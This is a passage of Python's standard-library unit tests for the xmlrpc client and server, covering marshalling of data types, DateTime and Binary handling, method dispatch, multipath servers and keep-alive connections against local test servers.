self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxsize > 2**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps,
(xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps,
(xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int,
xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int,
xmlrpclib.MININT-1, dummy_write)
def test_dump_double(self):
xmlrpclib.dumps((float(2 ** 34),))
xmlrpclib.dumps((float(xmlrpclib.MAXINT),
float(xmlrpclib.MININT)))
xmlrpclib.dumps((float(xmlrpclib.MAXINT + 42),
float(xmlrpclib.MININT - 42)))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_double(xmlrpclib.MAXINT, dummy_write)
m.dump_double(xmlrpclib.MININT, dummy_write)
m.dump_double(xmlrpclib.MAXINT + 42, dummy_write)
m.dump_double(xmlrpclib.MININT - 42, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEqual(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_dump_encoding(self):
value = {'key\u20ac\xa4':
'value\u20ac\xa4'}
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15')
strg = "<?xml version='1.0' encoding='iso-8859-15'?>" + strg
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = strg.encode('iso-8859-15', 'xmlcharrefreplace')
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodresponse=True)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = strg.encode('iso-8859-15', 'xmlcharrefreplace')
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
methodname = 'method\u20ac\xa4'
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodname=methodname)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
self.assertEqual(xmlrpclib.loads(strg)[1], methodname)
def test_dump_bytes(self):
sample = b"my dog has fleas"
self.assertEqual(sample, xmlrpclib.Binary(sample))
for type_ in bytes, bytearray, xmlrpclib.Binary:
value = type_(sample)
s = xmlrpclib.dumps((value,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
(newvalue,) = result
self.assertEqual(newvalue, sample)
self.assertIs(type(newvalue), bytes)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newvalue,) = result
self.assertEqual(newvalue, sample)
self.assertIs(type(newvalue), xmlrpclib.Binary)
self.assertIsNone(m)
def test_loads_unsupported(self):
ResponseError = xmlrpclib.ResponseError
data = '<params><param><value><spam/></value></param></params>'
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><array>'
'<value><spam/></value>'
'</array></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><struct>'
'<member><name>a</name><value><spam/></value></member>'
'<member><name>b</name><value><spam/></value></member>'
'</struct></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
def check_loads(self, s, value, **kwargs):
dump = '<params><param><value>%s</value></param></params>' % s
result, m = xmlrpclib.loads(dump, **kwargs)
(newvalue,) = result
self.assertEqual(newvalue, value)
self.assertIs(type(newvalue), type(value))
self.assertIsNone(m)
def test_load_standard_types(self):
check = self.check_loads
check('string', 'string')
check('<string>string</string>', 'string')
check('<string>𝔘𝔫𝔦𝔠𝔬𝔡𝔢 string</string>', '𝔘𝔫𝔦𝔠𝔬𝔡𝔢 string')
check('<int>2056183947</int>', 2056183947)
check('<int>-2056183947</int>', -2056183947)
check('<i4>2056183947</i4>', 2056183947)
check('<double>46093.78125</double>', 46093.78125)
check('<boolean>0</boolean>', False)
check('<base64>AGJ5dGUgc3RyaW5n/w==</base64>',
xmlrpclib.Binary(b'\x00byte string\xff'))
check('<base64>AGJ5dGUgc3RyaW5n/w==</base64>',
b'\x00byte string\xff', use_builtin_types=True)
check('<dateTime.iso8601>20050210T11:41:23</dateTime.iso8601>',
xmlrpclib.DateTime('20050210T11:41:23'))
check('<dateTime.iso8601>20050210T11:41:23</dateTime.iso8601>',
datetime.datetime(2005, 2, 10, 11, 41, 23),
use_builtin_types=True)
check('<array><data>'
'<value><int>1</int></value><value><int>2</int></value>'
'</data></array>', [1, 2])
check('<struct>'
'<member><name>b</name><value><int>2</int></value></member>'
'<member><name>a</name><value><int>1</int></value></member>'
'</struct>', {'a': 1, 'b': 2})
def test_load_extension_types(self):
check = self.check_loads
check('<nil/>', None)
check('<ex:nil/>', None)
check('<i1>205</i1>', 205)
check('<i2>20561</i2>', 20561)
check('<i8>9876543210</i8>', 9876543210)
check('<biginteger>98765432100123456789</biginteger>',
98765432100123456789)
check('<float>93.78125</float>', 93.78125)
check('<bigdecimal>9876543210.0123456789</bigdecimal>',
decimal.Decimal('9876543210.0123456789'))
def test_get_host_info(self):
# see bug #3613, this raised a TypeError
transp = xmlrpc.client.Transport()
self.assertEqual(transp.get_host_info("user@host.tld"),
('host.tld',
[('Authorization', 'Basic dXNlcg==')], {}))
def test_ssl_presence(self):
try:
import ssl
except ImportError:
has_ssl = False
else:
has_ssl = True
try:
xmlrpc.client.ServerProxy('https://localhost:9999').bad_function()
except NotImplementedError:
self.assertFalse(has_ssl, "xmlrpc client's error with SSL support")
except OSError:
self.assertTrue(has_ssl)
def test_keepalive_disconnect(self):
class RequestHandler(http.server.BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
handled = False
def do_POST(self):
length = int(self.headers.get("Content-Length"))
self.rfile.read(length)
if self.handled:
self.close_connection = True
return
response = xmlrpclib.dumps((5,), methodresponse=True)
response = response.encode()
self.send_response(http.HTTPStatus.OK)
self.send_header("Content-Length", len(response))
self.end_headers()
self.wfile.write(response)
self.handled = True
self.close_connection = False
def log_message(self, format, *args):
# don't clobber sys.stderr
pass
def run_server():
server.socket.settimeout(float(1)) # Don't hang if client fails
server.handle_request() # First request and attempt at second
server.handle_request() # Retried second request
server = http.server.HTTPServer((socket_helper.HOST, 0), RequestHandler)
self.addCleanup(server.server_close)
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join)
url = "http://{}:{}/".format(*server.server_address)
with xmlrpclib.ServerProxy(url) as p:
self.assertEqual(p.method(), 5)
self.assertEqual(p.method(), 5)
class SimpleXMLRPCDispatcherTestCase(unittest.TestCase):
class DispatchExc(Exception):
"""Raised inside the dispatched functions when checking for
chained exceptions"""
def test_call_registered_func(self):
"""Calls explicitly registered function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_params = 1, 2, 3
def dispatched_func(*params):
raise self.DispatchExc(params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_function(dispatched_func)
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch('dispatched_func', exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_params,))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_call_instance_func(self):
"""Calls a registered instance attribute as a function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_params = 1, 2, 3
class DispatchedClass:
def dispatched_func(self, *params):
raise SimpleXMLRPCDispatcherTestCase.DispatchExc(params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(DispatchedClass())
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch('dispatched_func', exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_params,))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_call_dispatch_func(self):
"""Calls the registered instance's `_dispatch` function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_method = 'method'
exp_params = 1, 2, 3
class TestInstance:
def _dispatch(self, method, params):
raise SimpleXMLRPCDispatcherTestCase.DispatchExc(
method, params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(TestInstance())
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch(exp_method, exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_method, exp_params))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_registered_func_is_none(self):
"""Calls explicitly registered function which is None"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_function(None, name='method')
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
def test_instance_has_no_func(self):
"""Attempts to call nonexistent function on a registered instance"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(object())
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
def test_cannot_locate_func(self):
"""Calls a function that the dispatcher cannot locate"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEqual(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEqual(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
def test_dotted_attribute(self):
# this will raise AttributeError because code don't want us to use
# private methods
self.assertRaises(AttributeError,
xmlrpc.server.resolve_dotted_attribute, str, '__add')
self.assertTrue(xmlrpc.server.resolve_dotted_attribute(str, 'title'))
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
with mock.patch('time.localtime') as localtime_mock:
time_struct = time.struct_time(
[2013, 7, 15, 0, 24, 49, 0, 196, 0])
localtime_mock.return_value = time_struct
localtime = time.localtime()
t = xmlrpclib.DateTime()
self.assertEqual(str(t),
time.strftime("%Y%m%dT%H:%M:%S", localtime))
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t),
time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %#x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t2, tref)
def test_comparison(self):
now = datetime.datetime.now()
dtime = xmlrpclib.DateTime(now.timetuple())
# datetime vs. DateTime
self.assertTrue(dtime == now)
self.assertTrue(now == dtime)
then = now + datetime.timedelta(seconds=4)
self.assertTrue(then >= dtime)
self.assertTrue(dtime < then)
# str vs. DateTime
dstr = now.strftime("%Y%m%dT%H:%M:%S")
self.assertTrue(dtime == dstr)
self.assertTrue(dstr == dtime)
dtime_then = xmlrpclib.DateTime(then.timetuple())
self.assertTrue(dtime_then >= dstr)
self.assertTrue(dstr < dtime_then)
# some other types
dbytes = dstr.encode('ascii')
dtuple = now.timetuple()
self.assertFalse(dtime == 1970)
self.assertTrue(dtime != dbytes)
self.assertFalse(dtime == bytearray(dbytes))
self.assertTrue(dtime != dtuple)
with self.assertRaises(TypeError):
dtime < float(1970)
with self.assertRaises(TypeError):
dtime > dbytes
with self.assertRaises(TypeError):
dtime <= bytearray(dbytes)
with self.assertRaises(TypeError):
dtime >= dtuple
self.assertTrue(dtime == ALWAYS_EQ)
self.assertFalse(dtime != ALWAYS_EQ)
self.assertTrue(dtime < LARGEST)
self.assertFalse(dtime > LARGEST)
self.assertTrue(dtime <= LARGEST)
self.assertFalse(dtime >= LARGEST)
self.assertFalse(dtime < SMALLEST)
self.assertTrue(dtime > SMALLEST)
self.assertFalse(dtime <= SMALLEST)
self.assertTrue(dtime >= SMALLEST)
class BinaryTestCase(unittest.TestCase):
# XXX What should str(Binary(b"\xff")) return? I'm chosing "\xff"
# for now (i.e. interpreting the binary data as Latin-1-encoded
# text). But this feels very unsatisfactory. Perhaps we should
# only define repr(), and return r"Binary(b'\xff')" instead?
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = b'\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), str(d, "latin-1"))
def test_decode(self):
d = b'\x01\x02\x03abc123\xff\xfe'
de = base64.encodebytes(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), str(d, "latin-1"))
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), str(d, "latin-1"))
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests, requestHandler=None, encoding=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
class Fixture:
@staticmethod
def getData():
return '42'
class MyXMLRPCServer(xmlrpc.server.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = xmlrpc.server.SimpleXMLRPCRequestHandler
serv = MyXMLRPCServer(("localhost", 0), requestHandler,
encoding=encoding,
logRequests=False, bind_and_activate=False)
try:
serv.server_bind()
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x: x, 'têšt')
@serv.register_function
def my_function():
'''This is my function'''
return True
@serv.register_function(name='add')
def _(x, y):
return x + y
testInstance = TestInstanceClass()
serv.register_instance(testInstance, allow_dotted_names=True)
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
def http_multi_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(xmlrpc.server.MultiPathXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = xmlrpc.server.SimpleXMLRPCRequestHandler
class MyRequestHandler(requestHandler):
rpc_paths = []
class BrokenDispatcher:
def _marshaled_dispatch(self, data, dispatch_method=None, path=None):
raise RuntimeError("broken dispatcher")
serv = MyXMLRPCServer(("localhost", 0), MyRequestHandler,
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
try:
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
paths = ["/foo", "/foo/bar"]
for path in paths:
d = serv.add_dispatcher(path, xmlrpc.server.SimpleXMLRPCDispatcher())
d.register_introspection_functions()
d.register_multicall_functions()
serv.get_dispatcher(paths[0]).register_function(pow)
serv.get_dispatcher(paths[1]).register_function(lambda x,y: x+y, 'add')
serv.add_dispatcher("/is/broken", BrokenDispatcher())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore OSErrors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
def make_request_and_skipIf(condition, reason):
# If we skip the test, we have to make a request because
# the server created in setUp blocks expecting one to come in.
if not condition:
return lambda func: func
def decorator(func):
def make_request_and_skip(self):
try:
xmlrpclib.ServerProxy(URL).my_function()
except (xmlrpclib.ProtocolError, OSError) as e:
if not is_unavailable_exception(e):
raise
raise unittest.SkipTest(reason)
return make_request_and_skip
return decorator
class BaseServerTestCase(unittest.TestCase):
requestHandler = None
request_count = 1
threadFunc = staticmethod(http_server)
def setUp(self):
# enable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, self.request_count, self.requestHandler)
thread = threading.Thread(target=self.threadFunc, args=serv_args)
thread.start()
self.addCleanup(thread.join)
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# disable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = False
class SimpleServerTestCase(BaseServerTestCase):
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_nonascii(self):
start_string = 'P\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}t'
end_string = 'h\N{LATIN SMALL LETTER O WITH HORN}n'
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_client_encoding(self):
start_string = '\u20ac'
end_string = '\xa4'
try:
p = xmlrpclib.ServerProxy(URL, encoding='iso-8859-15')
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_nonascii_methodname(self):
try:
p = xmlrpclib.ServerProxy(URL, encoding='ascii')
self.assertEqual(p.têšt(42), 42)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_404(self):
# send POST with http.client, it should return 404 header and
# 'Not Found' message.
with contextlib.closing(http.client.HTTPConnection(ADDR, PORT)) as conn:
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
expected_methods = set(['pow', 'div', 'my_function', 'add', 'têšt',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall',
'Fixture'])
try:
p = xmlrpclib.ServerProxy(URL)
meth = p.system.listMethods()
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy(URL)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy(URL)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy(URL)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<class \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<class \'Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
xmlrpc.server.resolve_dotted_attribute, str, '__add')
self.assertTrue(xmlrpc.server.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
def test_allow_dotted_names_true(self):
# XXX also need allow_dotted_names_false test.
server = xmlrpclib.ServerProxy("http://%s:%d/RPC2" % (ADDR, PORT))
data = server.Fixture.getData()
self.assertEqual(data, '42')
def test_unicode_host(self):
server = xmlrpclib.ServerProxy("http://%s:%d/RPC2" % (ADDR, PORT))
self.assertEqual(server.add("a", "\xe9"), "a\xe9")
def test_partial_post(self):
# Check that a partial POST doesn't make the server loop: issue #14001.
with contextlib.closing(socket.create_connection((ADDR, PORT))) as conn:
conn.send('POST /RPC2 HTTP/1.0\r\n'
'Content-Length: 100\r\n\r\n'
'bye HTTP/1.1\r\n'
f'Host: {ADDR}:{PORT}\r\n'
'Accept-Encoding: identity\r\n'
'Content-Length: 0\r\n\r\n'.encode('ascii'))
def test_context_manager(self):
with xmlrpclib.ServerProxy(URL) as server:
server.add(2, 3)
self.assertNotEqual(server('transport')._connection,
(None, None))
self.assertEqual(server('transport')._connection,
(None, None))
def test_context_manager_method_error(self):
try:
with xmlrpclib.ServerProxy(URL) as server:
server.add(2, "a")
except xmlrpclib.Fault:
pass
self.assertEqual(server('transport')._connection,
(None, None))
class SimpleServerEncodingTestCase(BaseServerTestCase):
@staticmethod
def threadFunc(evt, numrequests, requestHandler=None, encoding=None):
http_server(evt, numrequests, requestHandler, 'iso-8859-15')
def test_server_encoding(self):
start_string = '\u20ac'
end_string = '\xa4'
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
class MultiPathServerTestCase(BaseServerTestCase):
threadFunc = staticmethod(http_multi_server)
request_count = 2
def test_path1(self):
p = xmlrpclib.ServerProxy(URL+"/foo")
self.assertEqual(p.pow(6,8), 6**8)
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
def test_path2(self):
p = xmlrpclib.ServerProxy(URL+"/foo/bar")
self.assertEqual(p.add(6,8), 6+8)
self.assertRaises(xmlrpclib.Fault, p.pow, 6, 8)
def test_path3(self):
p = xmlrpclib.ServerProxy(URL+"/is/broken")
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class BaseKeepaliveServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
parentClass = xmlrpc.server.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
myRequests = []
def handle(self):
self.myRequests.append([])
self.reqidx = len(self.myRequests)-1
return self.parentClass.handle(self)
def handle_one_request(self):
result = self.parentClass.handle_one_request(self)
self.myRequests[self.reqidx].append(self.raw_requestline)
return result
requestHandler = RequestHandler
def setUp(self):
#clear request log
self.RequestHandler.myRequests = []
return BaseServerTestCase.setUp(self)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class KeepaliveServerTestCase1(BaseKeepaliveServerTestCase):
def test_two(self):
p = xmlrpclib.ServerProxy(URL)
#do three requests.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
#they should have all been handled by a single request handler
self.assertEqual(len(self.RequestHandler.myRequests), 1)
#check that we did at least two (the third may be pending append
#due to thread scheduling)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
#test special attribute access on the serverproxy, through the __call__
#function.
class KeepaliveServerTestCase2(BaseKeepaliveServerTestCase):
#ask for two keepalive requests to be handled.
request_count=2
def test_close(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")() #this should trigger a new keep-alive request
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
#they should have all been two request handlers, each having logged at least
#two complete requests
self.assertEqual(len(self.RequestHandler.myRequests), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-2]), 2)
def test_transport(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
p("transport").close() #same as above, really.
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
self.assertEqual(len(self.RequestHandler.myRequests), 2)
#A test case that verifies that gzip encoding works in both directions
#(for a request and the response)
@unittest.skipIf(gzip is None, 'requires gzip')
class GzipServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
parentClass = xmlrpc.server.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
def do_POST(self):
#store content of last request in class
self.__class__.content_length = int(self.headers["content-length"])
return self.parentClass.do_POST(self)
requestHandler = RequestHandler
class Transport(xmlrpclib.Transport):
#custom transport, stores the response length for our perusal
fake_gzip = False
def parse_response(self, response):
self.response_length=int(response.getheader("content-length", 0))
return xmlrpclib.Transport.parse_response(self, response)
def send_content(self, connection, body):
if self.fake_gzip:
